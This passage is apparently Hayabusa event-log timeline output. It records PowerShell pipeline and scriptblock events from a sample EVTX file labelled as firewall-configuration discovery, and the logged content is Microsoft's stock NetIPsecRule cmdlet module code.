$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue =,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 